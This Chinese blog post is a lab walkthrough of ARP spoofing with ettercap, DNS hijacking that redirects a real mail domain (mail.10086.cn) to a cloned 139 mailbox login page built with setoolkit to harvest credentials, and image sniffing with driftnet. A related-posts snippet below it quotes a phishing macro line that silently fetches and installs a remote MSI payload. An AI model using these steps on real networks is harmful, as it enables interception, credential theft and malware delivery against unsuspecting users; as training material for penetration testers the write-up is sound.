内网渗透之 arp欺骗-dns劫持-网站钓鱼

原创 已于 2022-02-26 12:32:08 修改 · 5.8k 阅读 · 26 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全 #渗透测试
于 2022-02-26 11:22:45 首次发布
本文介绍了在Kali Linux环境下,如何进行ARP欺骗和DNS劫持操作,包括使用ettercap工具进行网络嗅探,编辑ettercap的etter.dns文件实现DNS劫持,以及利用setoolkit创建钓鱼网站来捕获用户登录信息。同时,提到了driftnet工具用于截获内网图片,但仅能捕获HTTP请求的图片。整个过程展示了网络攻防的基本技术与步骤。

环境信息

攻击机kali 192.168.10.124

靶机win7 192.168.10.229

arp欺骗

用到ettercap工具

1、启动ettercap -G

image-20220210165852584

2、设置嗅探网卡,如eth0

扫描存活主机

image-20220210170153443

将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2

image-20220210170609911

进行arp欺骗

image-20220210170533126

image-20220210170639222

此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功

image-20220210170924426

dns劫持

1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dns

添加mail.10086.cn A 192.168.10.124

image-20220210182121951

2、在前面arp欺骗的基础上,点击ettercap的插件这里

image-20220210181521296

3、双击dns_spoof,前面有*号,代表开始dns劫持

image-20220210181706396

4、此时再次ping mail.10086.cn,发现已经解析到kali主机(10.205是我换了另一台kali)

image-20220210191134390

image-20220210192121332

正常ettercap这里应该能看到用户登录信息,但是可能是环境问题,几次都没有复现成功。

网站钓鱼

kali输入setoolkit启动setoolkit

依次选择

image-20220210171901313

image-20220210171920217

image-20220210171946492

image-20220210172009172

输入kali IP 192.168.10.124

image-20220210172052156

输入要克隆的网站,一般是后台登录路径url,实战中https的抓到的是密文

image-20220210172226789

kali本地访问kali地址192.168.10.124,弹出139邮箱的克隆页面,证明克隆成功,这里随便输入用户名密码,点击登录

image-20220210172351706

可以看到用户名密码

image-20220210172520821

正常这里需要配合上面的dns劫持,受害者去访问域名,或许用户名密码,因为受害者不会直接访问黑客IP的

截获图片

通过driftnet可以截获内网里的图片

输入driftnet -i eth0 -a -d /root/ 可以将抓取到的目标访问图片保存到kali的root目录下

前提是前面已做了arp欺骗,我在实际测试中,发现只能截获http请求的图片,https的不行

且记得做转发

echo 1 > /proc/sys/net/ipv4/ip_forward  #配置转发(如果不设置转发,靶机会出现不能上网的情况)

cat /proc/sys/net/ipv4/ip_forward	#验证如果返回是1,说明转发成功

参考 https://www.bilibili.com/video/BV1rU4y1u75f

第140天:内网安全-横向移动&局域网&ARP欺骗&DNS劫持钓鱼&中间人单双向
最新发布
weixin_71529930的博客
09-03 1432
dns会优先从本地缓存>host文件>本地dns服务器>根域dns服务器>顶级dns服务器>权威dns服务器。这个实验的原理应该就是告诉dns我时被控主机,告诉被控主机我是dns,开启转发的话,还能正常访问,关闭的话就不行了。原理:一台主机不停的向另一台主机发送数据包,并告诉他我是网关,我的ip是网关ip,mac地址却不对应,导致被攻击主机找不到网关,就没有网络。双向原理: 就是告诉网关,我是被控制的主机,告诉被控制主机,我是网关,如果开启转发的话,那么流量都会通过攻击主机。
在学校机房进行的一次内网渗透DNS欺骗
PigVillage_Terry
11-01 1万+
上个星期的课上林老板讲到了很多年前的钓鱼网站原理,今天心血来潮突然想试试,就没有好好听课了哈哈哈哈。(求林老板别挂我科) 小白一只,求大牛们勿喷,有不对的地方请帮忙指正。 一、系统环境 Kali Linux 2.0 (前身是Backtrack系列):著名的渗透测试系统,集成了很多专业的渗透工具 Ettercap 0.8.2 :一款强大的网络嗅探工具,可以进行ARP欺骗
内网安全-arp欺骗dns劫持钓鱼
weixin_58782362的博客
11-05 1206
攻击机一直发送伪造的数据包,欺骗网关自己是靶机,欺骗靶机自己是网关,同时开启路由转发功能,就可以让靶机在正常上网的情况下截获网络数据包,所有数据都会经过攻击机再转发给靶机。攻击机伪造数据包后本应该传输给靶机的数据错误的传输给攻击机,使靶机得不到服务器的响应数据,甚至根本无法将数据包发送出局域网。在设置的规则中,记住选择有可能解析的域名,将三级域名解析成二级域名。arpspoof -i enth -t 目标 -r 网卡。dns劫持,在arp欺骗的基础上面进行劫持。使用ettercap kali自带。
局域网内恶作剧_kali的arp攻击、密码嗅探、图片嗅探的演示
热门推荐
chenjie的博客
08-06 3万+
图文讲解kali在局域网内的apr攻击、嗅探操作。上手快!
内网横向移动—ARP攻击&图片捕捉&数据劫持&DNS劫持
剁椒鱼头没剁椒的博客
08-12 2706
ARP(Address Resolution Protocol)是一种TCP/IP协议,用于根据IP地址获取物理地址。在计算机发送信息时,如果需要知道目标IP地址的物理地址,就会使用ARP协议。该协议会通过将目标IP地址广播到局域网上的所有主机,并接收返回的消息来获取目标物理地址。一旦收到返回的消息,计算机就会将该IP地址和物理地址存入本机ARP缓存中,以便下次请求时直接查询,从而节约资源。
java 域服务器 验证
weixin_30242907的博客
12-31 216
到与服务器端用域用户进行身份验证:代码try{UniAddressdc=UniAddress.getByName("192.168.10.229");jcifs.smb.NtlmPasswordAuthenticationauth=newjcifs.smb.NtlmPasswordAuthentication(...
基于内网dns劫持与网页挂马实测案例
qq_36585338的博客
11-26 2463
关于dns劫持与flush钓鱼挂马的一次真实案例复现,其中包括cs打枪神器的使用测试
Kali渗透-DNS域名劫持钓鱼
道阻且长,行则将至
03-02 1万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的一款基于ARP地址欺骗的网络嗅探工具Ettercap,对局域网内的 Win7 主机进行 DNS 域名劫持,从而使得受害主机访问新浪官网(或其他任意网站)的域名时跳转到 Kali 攻击机指定的恶意网页,实现网络钓鱼攻击。 环境说明 主机 IP地址 Kali Linux...
手把手教你DNS劫持挂马
Ms08067安全实验室
03-12 7226
文章来源|MS08067 内网安全知识星球本文作者:BlackCat(Ms08067内网安全小组成员)内网纵横四海 认准Ms08067首先学习DNS劫持之前,务必要了解下DNS是个什么玩...
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
lw19155275856的博客
03-14 1631
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
WEB安全-内网渗透
m0_73767545的博客
03-10 911
利用命令判断主机是否在域内。利用工具进行内网信息收集。
在 Kubernetes 上拉取 Harbor 私有仓库镜像并部署服务
你是我的天晴
06-13 2493
今天来讲解下怎么让k8s直接拉取Harbor 私有仓库上面的镜像。
黑客技术—dns劫持
asdf8968的博客
11-07 1万+
目录 一、什么是DNS二、DNS原理三、什么是DNS劫持及危害四、DNS劫持方法五、如何防止DNS劫持(网络层面)六、如何防止DNS劫持(应用层面)七、历史著名劫持案例 检测网站是否被劫持  域名是否被墙  DNS污染检测  网站打开速度检测  网站是否被黑  被入侵  被改标题  被挂黑链     网站劫持检测  远程桌面连接软件    一、什么是DNS 在网络中,机器之间只认识I...
140-横向移动&局域网&ARP欺骗&DNS劫持钓鱼&中间人单双向
dreamer292的博客
08-24 574
没什么好说的网上教程非常多,我的入坑实验就是这个arp欺骗和嗅探🤣🤣🤣,可以去github下几个Windows版本的arp,用wifi的时候启动arp把其他人全部踢出去看谁敢抢我的网🤣🤣🤣
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 3573
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
网络安全之内外网渗透-网络钓鱼技巧
weixin_46626737的博客
06-30 416
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入宏表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用宏的文件,在通过邮件发。利用生成的宏代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择宏,取名,编辑,在编辑弹出的框中加。
利用arp攻击和dns欺骗设置钓鱼网站
2302_76659180的博客
12-27 722
利用arp的断网攻击和dns欺骗结合制作钓鱼网站
docker login 到 harbor 出现 connection refused
maplecsd的博客
04-30 1347
harbor 启动在 192.168.10.124,使用 docker login 192.168.10.124:80 登录到 harbor 一直出现 connection refused。
青岛实训DAY12---dns域名解析
m0_68890540的博客
07-23 1174
要求:三台有ip地址的虚拟机web服务器 192.168.10.125dns服务器 192.168.10.123cli客户端 192.168.10.124三台都要关闭防火墙。
Kaili-Linux局域网下DNS欺骗
qq_42383069的博客
11-25 2526
教你如何在局域网下实现DNS欺骗,让室友感觉PC被“黑”。 今天我们用到的工具是ettercap 1.用ifconfig查看自己ip。2.进入此电脑/etc/Ettercap目录,修改etter.dns文件,如下图修改即可。(*代表全部网站) 3.修改dns欺骗之后要显示的网页,进入/var/www/html中,自己写一个网页然后替换index.html文件。(注意,最后完事之后可能会提示没有权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值